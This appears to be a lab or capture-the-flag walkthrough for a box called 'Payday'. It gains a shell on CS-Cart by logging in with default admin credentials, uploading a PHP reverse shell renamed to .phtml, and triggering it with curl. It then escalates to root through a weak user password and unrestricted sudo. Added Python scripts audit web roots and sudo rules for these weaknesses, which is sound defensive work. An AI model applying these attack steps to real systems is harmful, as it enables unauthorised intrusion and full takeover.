Payday
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.157.39
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 13:42 +08
Nmap scan report for 192.168.157.39
Host is up (0.18s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3
CS-Cart -> RCE
Port 80 was running InternetShop CS-Cart, an e-commerce application with a long list of public exploits:

There are loads of exploits for this:
$ searchsploit cs-cart
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
CS-Cart - Multiple SQL Injections | php/webapps/27030.txt
CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting | php/webapps/31443.txt
CS-Cart 1.3.3 - 'classes_dir' LFI | php/webapps/48890.txt
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion | php/webapps/1872.txt
CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting | multiple/webapps/14962.txt
CS-Cart 1.3.3 - authenticated RCE | php/webapps/48891.txt
CS-Cart 1.3.5 - Authentication Bypass | php/webapps/6352.txt
CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection | php/webapps/8184.txt
CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection | php/webapps/33146.txt
CS-Cart 2.2.1 - 'products.php' SQL Injection | php/webapps/36093.txt
CS-Cart 4.2.4 - Cross-Site Request Forgery | php/webapps/36358.html
CS-Cart 4.3.10 - XML External Entity Injection | php/webapps/40770.txt
----------------------------------------------------------- ---------------------------------
We can take a look at the authenticated RCE, since we can log in using admin:admin.
$ cat 48891.txt
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml -> Profit. ...!
We can then access admin.php with the same credentials:

Head to 'Template Editor' and upload the reverse shell (rev.phtml, renamed as the exploit notes describe).

Then, just run this:
$ curl http://192.168.157.39/skins/rev.phtml
And we would get a reverse shell:

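The upload step above works because the file filter (if any) only cares about the .php suffix, while Apache's default PHP handler also executes .phtml and .phar. The following audit script is an added example, not part of the original writeup or of CS-Cart: it mirrors the Debian/Ubuntu mod_php FilesMatch pattern, applies an allow-list check to upload names, and flags script files that have landed in directories that should hold only templates and assets. The directory list and the allowed extensions are assumptions for the example.

```python
import os
import re

# Mirrors the default Debian/Ubuntu mod_php handler
# (<FilesMatch ".+\.ph(ar|p|tml)$">): any name matching this is run as PHP,
# so a filter that blocks only ".php" still lets ".phtml" and ".phar" through.
PHP_EXEC_RE = re.compile(r"\.ph(ar|p|tml)$", re.IGNORECASE)

# Assumed for this example: directories of a CS-Cart style install that should
# contain templates and static assets only, never server-side scripts.
STATIC_DIRS = ("skins", "images", "var/files")

# Assumed allow-list for template/asset uploads.
ALLOWED_EXT = (".tpl", ".css", ".js", ".png", ".jpg", ".gif")


def is_php_executable(filename: str) -> bool:
    """True if Apache's default PHP handler would execute this filename."""
    return PHP_EXEC_RE.search(filename) is not None


def allowed_upload_name(filename: str, allowed=ALLOWED_EXT) -> bool:
    """Allow-list check for an upload name: the final extension must be in the
    allow-list and no dotted component may look like a PHP extension (so
    'rev.phtml.css' is rejected, which matters on servers using AddHandler)."""
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) < 2:
        return False  # no extension at all
    if any(re.fullmatch(r"ph(ar|p|tml)\d?", p) for p in parts[1:]):
        return False
    return "." + parts[-1] in allowed


def classify_paths(rel_paths, static_dirs=STATIC_DIRS):
    """Return the paths (relative to the web root) that would execute as PHP
    but sit under a directory that should hold only templates/assets."""
    flagged = []
    for rel in rel_paths:
        norm = rel.replace("\\", "/").lstrip("/")
        under_static = any(norm.startswith(d.rstrip("/") + "/") for d in static_dirs)
        if under_static and is_php_executable(norm):
            flagged.append(norm)
    return flagged


def scan_webroot(root, static_dirs=STATIC_DIRS):
    """Walk a real web root and classify every file found."""
    rels = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            rels.append(os.path.relpath(os.path.join(dirpath, f), root))
    return classify_paths(rels, static_dirs)


if __name__ == "__main__":
    # Constructed sample listing for a dry run; not taken from any real host.
    sample = ["index.php", "admin.php", "skins/basic/customer/index.tpl",
              "skins/rev.phtml", "images/logo.png", "images/a.phar"]
    print(classify_paths(sample))
```

Run scan_webroot() against the document root from cron or a file-integrity job; a hit under skins/ is exactly the artefact this attack leaves behind. The stronger fix is configuration: deny PHP execution in those directories outright (for Apache, a `<Directory>` block with `php_admin_flag engine off` or `RemoveHandler`), so a renamed upload is served as text rather than run.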
Privilege Escalation
Weak Creds -> Root
We can su to the user patrick using the password patrick. This user can run sudo for everything:
patrick@payday:/home$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
(ALL) ALL
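A blanket (ALL) ALL rule like the one above turns any weak account password into root. The parser below is an added example, not part of the original writeup: it reads sudo -l output (the sample constant is the output shown on this page), skips the lecture banner and prompt, and reports entries that grant every command as every user, which is what an audit of sudoers should surface. The regex covers the common (runas) [NOPASSWD:] command layout only; that is an assumption of the example.

```python
import re

# Output shown on this page, embedded here as sample input.
SAMPLE_SUDO_L = """We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
    (ALL) ALL
"""

# One rule line:  (runas_user[ : runas_group]) [NOPASSWD:|PASSWD:] cmd[, cmd...]
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*(NOPASSWD:\s*|PASSWD:\s*)?(.*)$")


def parse_sudo_l(text):
    """Parse 'sudo -l' output into (runas, nopasswd, command) tuples.
    Everything before the 'may run the following commands' header is ignored."""
    entries = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tag, cmds = m.group(1).strip(), m.group(2), m.group(3)
        nopasswd = tag is not None and tag.startswith("NOPASSWD")
        for cmd in (c.strip() for c in cmds.split(",")):
            if cmd:
                entries.append((runas, nopasswd, cmd))
    return entries


def unrestricted(entries):
    """Entries granting any command as any user: effectively a root account."""
    return [e for e in entries
            if e[2] == "ALL" and e[0].split(":")[0].strip() == "ALL"]


if __name__ == "__main__":
    rules = parse_sudo_l(SAMPLE_SUDO_L)
    for runas, nopasswd, cmd in rules:
        print(f"runas={runas!r} nopasswd={nopasswd} cmd={cmd!r}")
    print("unrestricted:", unrestricted(rules))
```

Fed the output of `sudo -l -U <user>` for each account on a host, this gives a quick list of who is root in all but name; the remediation is to scope those users to the specific commands they need and to enforce a password policy that rejects the username as a password.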
